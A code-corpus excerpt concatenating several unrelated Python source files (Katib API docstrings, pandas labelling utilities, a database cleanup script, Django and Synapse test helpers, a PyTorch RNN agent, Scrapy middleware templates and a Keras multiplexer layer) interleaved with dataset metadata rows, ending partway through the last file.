:type: V1alpha3MetricsCollectorSpec
Gets the nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:return: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3NasConfig
Sets the nas_config of this V1alpha3ExperimentSpec.
:param nas_config: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3NasConfig
Gets the objective of this V1alpha3ExperimentSpec. # noqa: E501
Describes the objective of the experiment. # noqa: E501
:return: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3ObjectiveSpec
Sets the objective of this V1alpha3ExperimentSpec.
Describes the objective of the experiment. # noqa: E501
:param objective: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3ObjectiveSpec
Gets the parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:return: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
Sets the parallel_trial_count of this V1alpha3ExperimentSpec.
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:param parallel_trial_count: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
Gets the parameters of this V1alpha3ExperimentSpec. # noqa: E501
List of hyperparameter configurations. # noqa: E501
:return: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: list[V1alpha3ParameterSpec]
Sets the parameters of this V1alpha3ExperimentSpec.
List of hyperparameter configurations. # noqa: E501
:param parameters: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:type: list[V1alpha3ParameterSpec]
Gets the resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:return: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: str
Sets the resume_policy of this V1alpha3ExperimentSpec.
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:param resume_policy: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:type: str
Returns the model properties as a dict
Returns the string representation of the model
Gets the trial_template of this V1alpha3ExperimentSpec. # noqa: E501
Template for each run of the trial. # noqa: E501
:return: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3TrialTemplate
Sets the trial_template of this V1alpha3ExperimentSpec.
Template for each run of the trial. # noqa: E501
:param trial_template: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3TrialTemplate
Katib
Swagger description for Katib # noqa: E501
OpenAPI spec version: v1alpha3-0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
coding: utf-8 noqa: F401 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: F401,E501 noqa: E501 noqa: E501 | 5,259 | en | 0.661605 |
## utility functions
## including: labelling, annotation, continuous borders
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
## create labels
def generate_class_label(data):
"""
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
"""
r_data = data.copy()
r_data['target'] = \
r_data.State.astype(np.str) + "_"+ \
r_data.From_X.astype(np.str)+ "," + r_data.From_Y.astype(np.str)+ "_" + \
r_data.To_X.astype(np.str)+ "," + r_data.To_Y.astype(np.str)
return r_data
def generate_class_label_and_drop(data):
"""
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
"""
r_data = data.copy()
r_data['target'] = \
r_data.State.astype(np.str) + "_"+ \
r_data.From_X.astype(np.str)+ "," + r_data.From_Y.astype(np.str)+ "_" + \
r_data.To_X.astype(np.str)+ "," + r_data.To_Y.astype(np.str)
r_data = r_data.drop('From_X', 1)
r_data = r_data.drop('From_Y', 1)
r_data = r_data.drop('To_Y', 1)
r_data = r_data.drop('To_X', 1)
r_data = r_data.drop('State', 1)
r_data = r_data.drop('ID', 1)
r_data = r_data.drop('Rng_ID', 1)
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
return r_data.reset_index()
def generate_class_label_presence(data, state_variable ="target"):
"""
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
"""
r_data = data.copy()
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data.loc[ r_data['target'].str.contains("Step"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Stand"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Walk"), 'target' ] = "Present"
# remove enter and leave
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
r_data.loc[ ~r_data['target'].str.contains("Present"), 'target' ] = "Not Present"
return r_data.reset_index()
def generate_class_label_dyn_vs_empty(data, state_variable ="target"):
"""
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
"""
r_data = data.copy()
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data.loc[ r_data['target'].str.contains("Walk"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Step"), 'target' ] = "Present"
r_data.loc[ r_data['target'].str.contains("Empty"), 'target' ] = "Not Present"
# remove enter and leave
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Stand") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
return r_data.reset_index()
def generate_class_label_presence_and_dynamic(data, state_variable ="State"):
"""
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
"""
r_data = data.copy()
r_data['target'] = r_data[state_variable].astype(np.str)
r_data = r_data[ ~r_data['target'].str.contains("Pause") ]
r_data = r_data[ ~r_data['target'].str.contains("Enter") ]
r_data = r_data[ ~r_data['target'].str.contains("Leave") ]
r_data.loc[ r_data['target'].str.contains("Step"), 'target' ] = "Step"
r_data.loc[ r_data['target'].str.contains("Walki"), 'target' ] = "Walk"
r_data.loc[ r_data['target'].str.contains("Stand"), 'target' ] = "Stand"
r_data.loc[ r_data['target'].str.contains("Empty"), 'target' ] = "Empty"
return r_data
def get_contigous_borders(indices):
"""
helper function to derive contiguous borders from a list of indices
Parameters
----------
indicies : all indices at which a certain thing occurs
Returns
-------
list of groups when the indices starts and ends (note: last element is the real last element of the group _not_ n+1)
"""
r =[ [indices[0]] ]
prev = r[0][0]
for ix,i in enumerate(indices):
# distance bw last occurence and current > 1
# then there is obviously a space
if (i - prev) > 1:
# add end
r[-1].append(indices[ix-1])
# add new start
r.append([ indices[ix] ])
prev = i
r[-1].append( indices[-1] )
return r
def get_contiguous_activity_borders(data, label):
"""
returns a dict with all starts ends of all labels provided in label variable
"""
labels = data[label].unique()
r = {}
for l in labels:
a = data[data[label] == l].index.values
r[l] = get_contigous_borders(a)
r['length'] = data.shape[0]
return(r)
def annotate(a):
"""
draws annotation into a sns heatmap using plt annotation
a : dictonary with activity name and borders
"""
min_length = 4
for k in a.keys():
if k == "length":
continue
borders = a[k]
for s,e in borders:
# need to correct for coordinates starting at 0,0
s_r = a['length'] - s
e_r = a['length'] - e
#print(s_r, e_r)
plt.annotate("",
xy=(4, s_r), xycoords='data',
xytext=(4, e_r), textcoords='data',
arrowprops=dict(shrink=0.0, headwidth=10.0, headlength=1.0, width=0.25, shrinkA=0.0, shrinkB=0.0 )
#arrowprops=dict(arrowstyle="|-|",
# connectionstyle="arc3"),
)
# only write text if enough space available
if s_r - e_r < min_length:
continue
plt.annotate(k,
xy=(7, s_r-((s_r-e_r)//2)-min_length//2), xycoords='data',
xytext=(7, s_r-((s_r-e_r)//2)-min_length//2), textcoords='data',
size=9
)
def get_trx_groups(data, group_key="_ifft_0"):
lst = data.columns[data.columns.str.contains(group_key)]
groups = [ [x[:-2]] for x in lst]
return groups | notebooks/pawel_ueb2/utility.py | 6,794 | draws annotation into a sns heatmap using plt annotation
a : dictonary with activity name and borders
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
generates class label on a copy of data using the columns
State, From_X, From_Y, To_X, To_Y
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
generates class label only for presence on a copy of data using only the columns
Removes: Pause and merges 'Step' and 'Stand' to same class
helper function to derive contiguous borders from a list of indices
Parameters
----------
indicies : all indices at which a certain thing occurs
Returns
-------
list of groups when the indices starts and ends (note: last element is the real last element of the group _not_ n+1)
returns a dict with all starts ends of all labels provided in label variable
utility functions including: labelling, annotation, continuous borders create labels remove enter and leave remove enter and leave distance bw last occurence and current > 1 then there is obviously a space add end add new start need to correct for coordinates starting at 0,0print(s_r, e_r)arrowprops=dict(arrowstyle="|-|", connectionstyle="arc3"), only write text if enough space available | 1,472 | en | 0.663768 |
# Script:
#
# remove all articles from the DB which have no
# references to them and are older than a number of days
#
# works with the db that is defined in the configuration
# pointed by ZEEGUU_CORE_CONFIG
#
# takes as argument the number of days before which the
# articles will be deleted.
#
# call like this to remove all articles older than 90 days
#
#
# python remove_unreferenced_articles.py 90
#
#
#
from zeeguu_core.model import Article, UserArticle, UserActivityData
from zeeguu_core import db
dbs = db.session
import sys
try:
DAYS = int(sys.argv[1])
except:
print ("\nOOOPS: you must provide a number of days before which the articles to be deleted\n")
exit(-1)
deleted = []
print("1. finding urls in activity data...")
all_urls = set()
all_activity_data = UserActivityData.query.all()
for each in all_activity_data:
url = each.find_url_in_extra_data()
if url:
all_urls.add(url)
print(f" ... url count: {len(all_urls)}")
#
print(f"2. finding articles older than {DAYS} days...")
all_articles = Article.all_older_than(days=DAYS)
print(f" ... article count: {len(all_articles)}")
i = 0
for each in all_articles:
i += 1
info = UserArticle.find_by_article(each)
url_found = each.url.as_string() in all_urls
if info or url_found:
if info:
print(f"WON'T DELETE info! {each.id} {each.title}")
for ainfo in info:
print(ainfo.user_info_as_string())
if url_found:
print(f"WON'T DELETE url_found! {each.id} {each.title}")
else:
deleted.append(each.id)
dbs.delete(each)
if i == 1000:
dbs.commit()
i = 0
dbs.commit()
print(f'Deleted: {deleted}')
| tools/remove_unreferenced_articles.py | 1,716 | Script: remove all articles from the DB which have no references to them and are older than a number of days works with the db that is defined in the configuration pointed by ZEEGUU_CORE_CONFIG takes as argument the number of days before which the articles will be deleted. call like this to remove all articles older than 90 days python remove_unreferenced_articles.py 90 | 377 | en | 0.918489 |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of the confirmation_aw3 skill."""
from aea.configurations.base import PublicId
PUBLIC_ID = PublicId.from_str("fetchai/confirmation_aw3:0.3.0")
| packages/fetchai/skills/confirmation_aw3/__init__.py | 985 | This module contains the implementation of the confirmation_aw3 skill.
-*- coding: utf-8 -*- ------------------------------------------------------------------------------ Copyright 2018-2019 Fetch.AI Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ------------------------------------------------------------------------------ | 831 | en | 0.732108 |
import pytest
from django.test import TestCase
from .factories import CoopTypeFactory, CoopFactory, AddressFactory, PhoneContactMethodFactory
from directory.models import Coop, CoopType
class ModelTests(TestCase):
@classmethod
def setUpTestData(cls):
print("setUpTestData: Run once to set up non-modified data for all class methods.")
#management.call_command('loaddata', 'test_data.yaml', verbosity=0)
pass
@pytest.mark.django_db
def test_phone_create(self):
""" Test phone contact method """ # create phone instance
phone_num = "7739441467"
phone = PhoneContactMethodFactory.create(phone=phone_num)
assert phone_num == phone.phone
assert phone.id is not None
@pytest.mark.django_db
def test_phone_create_invalid_num(self):
""" Test phone contact method """ # create phone instance
phone_num = "abcdefsfdsf"
phone = PhoneContactMethodFactory.create(phone=phone_num)
assert phone_num == phone.phone
assert phone.id is not None
print("\n\n\n\n-------------id is ", id)
@pytest.mark.django_db
def test_coop_type_create(self):
""" Test coop type model """ # create customer model instance
coop_type = CoopTypeFactory(name="Test Coop Type Name")
assert coop_type.name == "Test Coop Type Name"
@pytest.mark.django_db
def test_address_create(self):
""" Test address model """ # create customer model instance
address = AddressFactory()
assert address is not None
@pytest.mark.django_db
def test_coop_create(self):
""" Test customer model """ # create customer model instance
coop_from_factory = CoopFactory()
self.assertIsNotNone(coop_from_factory)
coop = Coop.objects.create(name='test')
coop.addresses.set(coop_from_factory.addresses.all())
self.assertIsNotNone(coop)
@pytest.mark.django_db
def test_coop_create_with_existing_type(self):
""" Test customer model """ # create customer model instance
coop_from_factory = CoopFactory()
self.assertIsNotNone(coop_from_factory)
coop_types = coop_from_factory.types
coop = CoopFactory.create(types=[coop_types.all().first()], addresses=coop_from_factory.addresses.all())
self.assertIsNotNone(coop)
@pytest.mark.django_db
def test_coop_create_with_no_types(self):
""" Test customer model """ # create customer model instance
print("\n\n\n\n**********-------- starting test ....\n")
coop = CoopFactory.build(types=[])
print("phone:",coop.phone.phone)
print("email:",coop.email.email)
coop.full_clean()
self.assertIsNotNone(coop)
self.assertIsNone( coop.id )
def test_search_coops_wo_coords(self):
"""
Look for coops with addresses without latitude/longitude coords
"""
address = AddressFactory(latitude=None, longitude=None)
coop_from_factory = CoopFactory(addresses=[address])
# Verify coop appears when we search for those without a lat/lon
coops = Coop.objects.find_wo_coords()
results = list(coops)
assert len(results) > 0, "Failed to find any matching results."
assert coop_from_factory in list(coops), "Failed to find coop."
| web/tests/test_models.py | 3,380 | Test address model
Test customer model
Test customer model
Test customer model
Test coop type model
Test phone contact method
Test phone contact method
Look for coops with addresses without latitude/longitude coords
management.call_command('loaddata', 'test_data.yaml', verbosity=0) create phone instance create phone instance create customer model instance create customer model instance create customer model instance create customer model instance create customer model instance Verify coop appears when we search for those without a lat/lon | 552 | en | 0.664679 |
import json
from io import BytesIO
from six import text_type
import attr
from zope.interface import implementer
from twisted.internet import address, threads, udp
from twisted.internet._resolver import HostResolution
from twisted.internet.address import IPv4Address
from twisted.internet.defer import Deferred
from twisted.internet.error import DNSLookupError
from twisted.internet.interfaces import IReactorPluggableNameResolver
from twisted.python.failure import Failure
from twisted.test.proto_helpers import MemoryReactorClock
from synapse.http.site import SynapseRequest
from synapse.util import Clock
from tests.utils import setup_test_homeserver as _sth
class TimedOutException(Exception):
"""
A web query timed out.
"""
@attr.s
class FakeChannel(object):
"""
A fake Twisted Web Channel (the part that interfaces with the
wire).
"""
_reactor = attr.ib()
result = attr.ib(default=attr.Factory(dict))
_producer = None
@property
def json_body(self):
if not self.result:
raise Exception("No result yet.")
return json.loads(self.result["body"].decode('utf8'))
@property
def code(self):
if not self.result:
raise Exception("No result yet.")
return int(self.result["code"])
def writeHeaders(self, version, code, reason, headers):
self.result["version"] = version
self.result["code"] = code
self.result["reason"] = reason
self.result["headers"] = headers
def write(self, content):
assert isinstance(content, bytes), "Should be bytes! " + repr(content)
if "body" not in self.result:
self.result["body"] = b""
self.result["body"] += content
def registerProducer(self, producer, streaming):
self._producer = producer
self.producerStreaming = streaming
def _produce():
if self._producer:
self._producer.resumeProducing()
self._reactor.callLater(0.1, _produce)
if not streaming:
self._reactor.callLater(0.0, _produce)
def unregisterProducer(self):
if self._producer is None:
return
self._producer = None
def requestDone(self, _self):
self.result["done"] = True
def getPeer(self):
# We give an address so that getClientIP returns a non null entry,
# causing us to record the MAU
return address.IPv4Address("TCP", "127.0.0.1", 3423)
def getHost(self):
return None
@property
def transport(self):
return self
class FakeSite:
"""
A fake Twisted Web Site, with mocks of the extra things that
Synapse adds.
"""
server_version_string = b"1"
site_tag = "test"
@property
def access_logger(self):
class FakeLogger:
def info(self, *args, **kwargs):
pass
return FakeLogger()
def make_request(
reactor,
method,
path,
content=b"",
access_token=None,
request=SynapseRequest,
shorthand=True,
):
"""
Make a web request using the given method and path, feed it the
content, and return the Request and the Channel underneath.
Args:
method (bytes/unicode): The HTTP request method ("verb").
path (bytes/unicode): The HTTP path, suitably URL encoded (e.g.
escaped UTF-8 & spaces and such).
content (bytes or dict): The body of the request. JSON-encoded, if
a dict.
shorthand: Whether to try and be helpful and prefix the given URL
with the usual REST API path, if it doesn't contain it.
Returns:
A synapse.http.site.SynapseRequest.
"""
if not isinstance(method, bytes):
method = method.encode('ascii')
if not isinstance(path, bytes):
path = path.encode('ascii')
# Decorate it to be the full path, if we're using shorthand
if shorthand and not path.startswith(b"/_matrix"):
path = b"/_matrix/client/r0/" + path
path = path.replace(b"//", b"/")
if isinstance(content, text_type):
content = content.encode('utf8')
site = FakeSite()
channel = FakeChannel(reactor)
req = request(site, channel)
req.process = lambda: b""
req.content = BytesIO(content)
if access_token:
req.requestHeaders.addRawHeader(
b"Authorization", b"Bearer " + access_token.encode('ascii')
)
if content:
req.requestHeaders.addRawHeader(b"Content-Type", b"application/json")
req.requestReceived(method, path, b"1.1")
return req, channel
def wait_until_result(clock, request, timeout=100):
"""
Wait until the request is finished.
"""
clock.run()
x = 0
while not request.finished:
# If there's a producer, tell it to resume producing so we get content
if request._channel._producer:
request._channel._producer.resumeProducing()
x += 1
if x > timeout:
raise TimedOutException("Timed out waiting for request to finish.")
clock.advance(0.1)
def render(request, resource, clock):
request.render(resource)
wait_until_result(clock, request)
@implementer(IReactorPluggableNameResolver)
class ThreadedMemoryReactorClock(MemoryReactorClock):
"""
A MemoryReactorClock that supports callFromThread.
"""
def __init__(self):
self._udp = []
self.lookups = {}
class Resolver(object):
def resolveHostName(
_self,
resolutionReceiver,
hostName,
portNumber=0,
addressTypes=None,
transportSemantics='TCP',
):
resolution = HostResolution(hostName)
resolutionReceiver.resolutionBegan(resolution)
if hostName not in self.lookups:
raise DNSLookupError("OH NO")
resolutionReceiver.addressResolved(
IPv4Address('TCP', self.lookups[hostName], portNumber)
)
resolutionReceiver.resolutionComplete()
return resolution
self.nameResolver = Resolver()
super(ThreadedMemoryReactorClock, self).__init__()
def listenUDP(self, port, protocol, interface='', maxPacketSize=8196):
p = udp.Port(port, protocol, interface, maxPacketSize, self)
p.startListening()
self._udp.append(p)
return p
def callFromThread(self, callback, *args, **kwargs):
"""
Make the callback fire in the next reactor iteration.
"""
d = Deferred()
d.addCallback(lambda x: callback(*args, **kwargs))
self.callLater(0, d.callback, True)
return d
def setup_test_homeserver(cleanup_func, *args, **kwargs):
"""
Set up a synchronous test server, driven by the reactor used by
the homeserver.
"""
d = _sth(cleanup_func, *args, **kwargs).result
if isinstance(d, Failure):
d.raiseException()
# Make the thread pool synchronous.
clock = d.get_clock()
pool = d.get_db_pool()
def runWithConnection(func, *args, **kwargs):
return threads.deferToThreadPool(
pool._reactor,
pool.threadpool,
pool._runWithConnection,
func,
*args,
**kwargs
)
def runInteraction(interaction, *args, **kwargs):
return threads.deferToThreadPool(
pool._reactor,
pool.threadpool,
pool._runInteraction,
interaction,
*args,
**kwargs
)
pool.runWithConnection = runWithConnection
pool.runInteraction = runInteraction
class ThreadPool:
"""
Threadless thread pool.
"""
def start(self):
pass
def stop(self):
pass
def callInThreadWithCallback(self, onResult, function, *args, **kwargs):
def _(res):
if isinstance(res, Failure):
onResult(False, res)
else:
onResult(True, res)
d = Deferred()
d.addCallback(lambda x: function(*args, **kwargs))
d.addBoth(_)
clock._reactor.callLater(0, d.callback, True)
return d
clock.threadpool = ThreadPool()
pool.threadpool = ThreadPool()
pool.running = True
return d
def get_clock():
clock = ThreadedMemoryReactorClock()
hs_clock = Clock(clock)
return (clock, hs_clock)
@attr.s
class FakeTransport(object):
"""
A twisted.internet.interfaces.ITransport implementation which sends all its data
straight into an IProtocol object: it exists to connect two IProtocols together.
To use it, instantiate it with the receiving IProtocol, and then pass it to the
sending IProtocol's makeConnection method:
server = HTTPChannel()
client.makeConnection(FakeTransport(server, self.reactor))
If you want bidirectional communication, you'll need two instances.
"""
other = attr.ib()
"""The Protocol object which will receive any data written to this transport.
:type: twisted.internet.interfaces.IProtocol
"""
_reactor = attr.ib()
"""Test reactor
:type: twisted.internet.interfaces.IReactorTime
"""
disconnecting = False
buffer = attr.ib(default=b'')
producer = attr.ib(default=None)
def getPeer(self):
return None
def getHost(self):
return None
def loseConnection(self):
self.disconnecting = True
def abortConnection(self):
self.disconnecting = True
def pauseProducing(self):
self.producer.pauseProducing()
def unregisterProducer(self):
if not self.producer:
return
self.producer = None
def registerProducer(self, producer, streaming):
self.producer = producer
self.producerStreaming = streaming
def _produce():
d = self.producer.resumeProducing()
d.addCallback(lambda x: self._reactor.callLater(0.1, _produce))
if not streaming:
self._reactor.callLater(0.0, _produce)
def write(self, byt):
self.buffer = self.buffer + byt
def _write():
if getattr(self.other, "transport") is not None:
self.other.dataReceived(self.buffer)
self.buffer = b""
return
self._reactor.callLater(0.0, _write)
_write()
def writeSequence(self, seq):
for x in seq:
self.write(x)
| tests/server.py | 10,677 | A fake Twisted Web Channel (the part that interfaces with the
wire).
A fake Twisted Web Site, with mocks of the extra things that
Synapse adds.
A twisted.internet.interfaces.ITransport implementation which sends all its data
straight into an IProtocol object: it exists to connect two IProtocols together.
To use it, instantiate it with the receiving IProtocol, and then pass it to the
sending IProtocol's makeConnection method:
server = HTTPChannel()
client.makeConnection(FakeTransport(server, self.reactor))
If you want bidirectional communication, you'll need two instances.
Threadless thread pool.
A MemoryReactorClock that supports callFromThread.
A web query timed out.
Make the callback fire in the next reactor iteration.
Make a web request using the given method and path, feed it the
content, and return the Request and the Channel underneath.
Args:
method (bytes/unicode): The HTTP request method ("verb").
path (bytes/unicode): The HTTP path, suitably URL encoded (e.g.
escaped UTF-8 & spaces and such).
content (bytes or dict): The body of the request. JSON-encoded, if
a dict.
shorthand: Whether to try and be helpful and prefix the given URL
with the usual REST API path, if it doesn't contain it.
Returns:
A synapse.http.site.SynapseRequest.
Set up a synchronous test server, driven by the reactor used by
the homeserver.
Wait until the request is finished.
We give an address so that getClientIP returns a non null entry, causing us to record the MAU Decorate it to be the full path, if we're using shorthand If there's a producer, tell it to resume producing so we get content Make the thread pool synchronous. | 1,676 | en | 0.84291 |
import torch.nn as nn
import torch.nn.functional as F
class RNNAgent(nn.Module):
def __init__(self, input_shape, args):
super(RNNAgent, self).__init__()
self.args = args
self.fc1 = nn.Linear(input_shape, args.rnn_hidden_dim)
self.rnn = nn.GRUCell(args.rnn_hidden_dim, args.rnn_hidden_dim)
if not args.levin_flag_quantile:
self.fc2 = nn.Linear(args.rnn_hidden_dim, args.n_actions)
else:
self.fc2 = nn.Linear(args.rnn_hidden_dim, args.n_actions * args.N_QUANT)
def init_hidden(self):
# make hidden states on same device as model
# 主要是在 controllers 中使用
return self.fc1.weight.new(1, self.args.rnn_hidden_dim).zero_()
def forward(self, inputs, hidden_state):
mb_size = inputs.size(0)
x = F.relu(self.fc1(inputs))
h_in = hidden_state.reshape(-1, self.args.rnn_hidden_dim)
h = self.rnn(x, h_in)
if not self.args.levin_flag_quantile:
q = self.fc2(h)
else:
q = self.fc2(h).view(mb_size, self.args.n_actions, self.args.N_QUANT)
return q, h
| src_convention/modules/agents/rnn_agent.py | 1,138 | make hidden states on same device as model 主要是在 controllers 中使用 | 63 | zh | 0.605508 |
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class TutorialSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class TutorialDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| tutorial/tutorial/middlewares.py | 3,601 | -*- coding: utf-8 -*- Define here the models for your spider middleware See documentation in: https://doc.scrapy.org/en/latest/topics/spider-middleware.html Not all methods need to be defined. If a method is not defined, scrapy acts as if the spider middleware does not modify the passed objects. This method is used by Scrapy to create your spiders. Called for each response that goes through the spider middleware and into the spider. Should return None or raise an exception. Called with the results returned from the Spider, after it has processed the response. Must return an iterable of Request, dict or Item objects. Called when a spider or process_spider_input() method (from other spider middleware) raises an exception. Should return either None or an iterable of Response, dict or Item objects. Called with the start requests of the spider, and works similarly to the process_spider_output() method, except that it doesn’t have a response associated. Must return only requests (not items). Not all methods need to be defined. If a method is not defined, scrapy acts as if the downloader middleware does not modify the passed objects. This method is used by Scrapy to create your spiders. Called for each request that goes through the downloader middleware. Must either: - return None: continue processing this request - or return a Response object - or return a Request object - or raise IgnoreRequest: process_exception() methods of installed downloader middleware will be called Called with the response returned from the downloader. Must either; - return a Response object - return a Request object - or raise IgnoreRequest Called when a download handler or a process_request() (from other downloader middleware) raises an exception. Must either: - return None: continue processing this exception - return a Response object: stops process_exception() chain - return a Request object: stops process_exception() chain | 1,931 | en | 0.87019 |
from keras.engine.topology import Layer
from keras.backend.tensorflow_backend import tf
class Multiplexer(Layer):
def __init__(self, output_dim, nb_ctrl_sig, **kwargs):
"""
This layer is used to split the output of a previous Dense layer into
nb_ctrl_sig groups of size output_dim, and choose which group to provide
as output using a discrete control signal.
It takes as input two tensors, namely the output of the previous layer
and a column tensor with int32 or int64 values for the control signal.
The Dense input to this layer must be of shape (None, prev_output_dim),
where prev_output_dim = output_dim * nb_ctrl_sig.
No checks are done at runtime to ensure that the input to the layer is
correct, so it's better to double check.
An example usage of this layer may be:
input = Input(shape=(3,))
control = Input(shape=(1,), dtype='int32')
hidden = Dense(6)(i) # output_dim == 2, nb_ctrl_sig == 3
output = Multiplexer(2, 3)([hidden, control])
model = Model(input=[input, control], output=output)
...
x = randn(3) # Input has size 3
ctrl = array([0, 1, 2])
# Outputs the first two neurons of the Dense layer
model.predict([x, ctrl[0]])
# Outputs the middle two neurons of the Dense layer
model.predict([x, ctrl[1]])
# Outputs the last two neurons of the Dense layer
model.predict([x, ctrl[2]])
# Arguments
output_dim: positive integer, dimensionality of the output space.
nb_ctrl_sig: positive integer, number of groups in which to split
the output of the previous layer. Must satisfy the relation:
input_size = nb_ctrl_sig * output_dim
"""
self.output_dim = output_dim
self.nb_ctrl_sig = nb_ctrl_sig
super(Multiplexer, self).__init__(**kwargs)
def build(self, input_shape):
super(Multiplexer, self).build(input_shape)
def call(self, args, mask=None):
return self.multiplexer(args, self.output_dim, self.nb_ctrl_sig)
def get_output_shape_for(self, input_shape):
return input_shape[0], self.output_dim
def compute_output_shape(self, input_shape):
assert input_shape and len(input_shape) >= 2
assert input_shape[-1]
output_shape = list(input_shape)
output_shape[-1] = self.output_dim
return tuple(output_shape)
@staticmethod
def multiplexer(args, output_size, nb_actions):
"""
Returns a tensor of shape (None, output_size) where each sample is
the result of masking each sample in full_input with a binary mask that
preserves only output_size elements, based on the corresponding control
value in indices.
"""
full_input, indices = args
'''
For example, given:
full_input: [[1, 2, 3, 4, 5, 6], [7, 8, 9, 10, 11, 12]]
nb_actions: 3
output_size: 2
indices: [[0], [2]]
desired output: [[1, 2], [11, 12]]
we want to output the first two elements (index 0) of the first sample
and the last two elements (index 2) of the second sample.
To do this, we need the absolute indices [[0, 1], [4, 5]].
To build these, first compute the base absolute indices (0 and 4) by
multiplying the control indices for the output size:
[[0], [2]] * 2 = [[0], [4]]
'''
base_absolute_indices = tf.multiply(indices, output_size)
'''
Build an array containing the base absolute indices repeated output_size
times:
[[0, 0], [4, 4]]
'''
bai_repeated = tf.tile(base_absolute_indices, [1, output_size])
'''
Finally, add range(output_size) to these tensors to get the full
absolute indices:
[0, 0] + [0, 1] = [0, 1]
